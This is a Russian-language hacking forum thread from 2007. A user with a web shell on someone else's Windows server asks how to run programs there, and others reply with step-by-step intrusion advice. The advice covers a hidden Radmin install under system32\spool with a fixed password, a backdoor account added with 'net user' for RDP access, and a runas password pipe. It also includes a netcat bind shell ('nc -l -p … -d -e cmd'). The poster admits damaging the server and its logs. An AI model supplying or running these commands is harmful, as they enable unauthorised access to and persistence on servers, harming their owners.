Удаленный запуск exe/bat

Discussion in 'Безопасность и Анонимность' started by Hana, 26 May 2007.

  1. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    - Есть доступ к компу (не локалхост)
    - Могу загружать (шелл...)/скачивать/удалять с сервера без ограничений
    - Win NT
    - Apache

    Как мне запустить на этом сервере какой-нибудь exe/bat файл?

    - Не помешает ли то, что тачка залагофена?
     
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    если в шелле есть поле для команд, просто вводишь имя исполняемого файла (полный путь)
     
  3. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    залагофена? это что -- микроб новый или болезьн какая----- пифлит правильно сказал закачай шелл и через него
     
  4. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    На локалхосте ехешка открывается - там нет.
    Еще пробовал "start Full_Patch" - у меня пашет - там нет.

    В чем м/б дело?
     
  5. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Специально для тебя разжевываю 2 вещи:
    1. "Залогофена" - Log Off - Пользователь не авторизовался в системе. Не влияет на выполнение программ из веб шелла.
    2. Читай внимательно начало темы. Шелл уже залит.

    Теперь по сабжу. Топикстартер, самый простой вариант, почему у тебя не выполняються комманды системы (в том числе и на исполнение файлов) это так назаваемый Safe Mode режим работы Apache сервера. Прежде чем выполнять exe или bat, попробуй выполнить комманду tasklist. Если оны выполниться, а программы - нет, то дело, скорее всего в дополнительной защите сервера. Впрочем это довольно большая редкость (доп.защита).
     
  6. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    safe_mode: OFF
    tasklist не выполняется. Еще можно что-то попробовать?
     
  7. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    PHP version: 5.2.1
    Disable functions : NONE
    Windows NT 5.0 build 2195

    При запуске (попытке) ехе или батника - ошибок не пишет и не ошибок тоже - просто начинает выполняться страница (загрузка) и продолжает это в течении 10 минут, потом я насильно перезахожу в шелл.
     
  8. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    Ну так и должно быть. Тебе сказали - выполни tasklist и посмотри висит ли твой ехе в процессах. Если нет, то значит фаервол/etc или банально нет прав.
     
  9. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Рассказываю....

    Значит так...

    1) качаешь http://limpompo.nm.ru/radmin_install.rar
    2) Заходишь на свой шелл... Меняешь диру на C:\windows\system32\spool
    3) Создаёшь папочку Командой mkdir setup - потом заходишь в неё
    4) Разархивируй Архив (Увидишь 4 файла)
    5) Заливай по одному на Дедик
    6) Запускай install.bat
    7) Установи у себя Клиета Radmin
    8) Коннектишься к Radmin server-у на порт 5454
    9) ВВодишь пароль vasea_123
    10) Ура... Можно и пивка выпить....
     
    2 people like this.
  10. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    Спасибо. Радмин уже залит!!!
    Подскажи только как сделать (6) пункт?

    Фаера вроде нет. Каких прав нет? Как они ставятся? Как их получить?
     
  11. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    заходишь на шелл и в командной строке пишешь
    C:\windows\system32\spool\setup\install.bat

    И всё =)
     
  12. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    Ты проблему темы читал?
     
  13. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    Hana

    Попробуй через твой шелл замутить дополнительного юзверя
    Code:
    net user vasia 123 /add 
    ну....если получитя конечно.....потом как создашь юзверя проверь есть ли он или нет
    Code:
    net user
    если в списке есть vasia, то можешь попытаться проконектиться через рдп: у ся на компе: ALT+R => mstsc => server.com
    если приконектится вводи логин vasia пароль 123 и всё......если получится то ты увидишь рабочий стол сервака!

    //ЗЫ: немнога поздновато конечно....но ниче.....может другим пригодится =0)
     
  14. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    Никогда не поздно =)
    Юзера добавил, правда не так просто... Привилегии админа.
    Но через рдп не лезет - пишет, что не удается подключиться...
    Это значит сервис выключен или можно еще что-то попробовать (логин и пасс точно правильные)?
     
  15. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    И заодно: как включается этот самый удаленный рабочий стол? Желательно чтобы слова можно было переделать в автоматизм (прогу напишу сам). Вопрос не для данного случая, но тоже нужен ;)
     
  16. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    попробуй стартануть сервис
    Code:
    net start REMOTEACCESS
    ...(на счёт названия сервиса я неуверен)если фаер будет блокировать, то придется работать с радмином или виэнси, пуск файлов типа exe/bat/cmd придется выполнять через команду runas такова типа
    Code:
    echo (твой_пароль) | runas /env /noprofile /user:(твой_юзер) install.exe 
     
    1 person likes this.
  17. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    Не могу даже у себя на компе - пишет что сервис выключен.
    Фаера там походу нет, но запустить что-либо связанное с нэтом не получатся:
    Написал консольку типа РанАс. Она запускается через шелл, и выдает мой текст "Все ок".
    Т.е. вроде должно запустится приложение. Написал еще одну прогу: при запуске конектиться на мой комп и через 5 сек выходит. Запускал и с своим РанАсом, и просто "напрямую" из шелла: ко мне никто так и не приконнектился. Этим же РанАсом удалил несколько папок (самопальных), которые не мог удалить чрез шелл командой rmdir (т.е. проги я могу запускать, но в нэт их кто-то не пускает). Думал проблема с ИПишкой сервака - но скорее всего ошибся, так как ко мне, повторюсь, этот самый сервак не приконнектился (у меня ИП норм).

    Что еще можно попробовать?

    Немного запортил сервак.
    1) что я мог сделать, что теперь апачь в логах пишет только один ИП: 0.0.0.0?
    2) если я перезагружу комп - апачь стартанется без ЛогИна?
    3) при "прямых запусках" программ черех шелл, шеллы виснут, т.е. немогу зайти повторно и удалить их с сервака. Так должно быть или...?
     
  18. Hana

    Hana Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    64
    Likes Received:
    4
    Reputations:
    7
    P.s. пробовал запускать радмина и свой собственный "ДУ стол".
     
  19. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    чем ты конектился к себе? покажи сорс проги....
    фаер не обязательно должен стоять именно на этой машине, он может быть и на другой через которую проходит весь трафик, а может там и рутер стоит ;).....выведи команду
    Code:
    netstat -ano
    просмотри какие порты прослушиваются, залей нэткэт и повесь консоль в бэкграунд
    Code:
    nc.exe или netcat.exe -l -p ( прослушивающийся порт ) -d -e cmd
    а потом через putty от себя в моде RAW или RLOGIN ( точно не помню ) конэктся на указанный тобою порт и воаля....консоль сервака у тебя в руках

    1) даже понятия не имей
    2) по идее должен без логина ( автоматичесkи ) - это же сервис
    3) если прога требует пароль из консоли то это логично, а может ещё из за графического интерфэйса oO

    //PS: "ДУ стол" - эта чё?
     
    1 person likes this.
  20. ßackTrack

    ßackTrack Member

    Joined:
    27 May 2007
    Messages:
    1
    Likes Received:
    5
    Reputations:
    0
    Hana, если есть доступ к командной строке, заходишь в папку с файлом (с помощью комманд cd =)) и просто пишешь start file.bat или start file.exe должно работать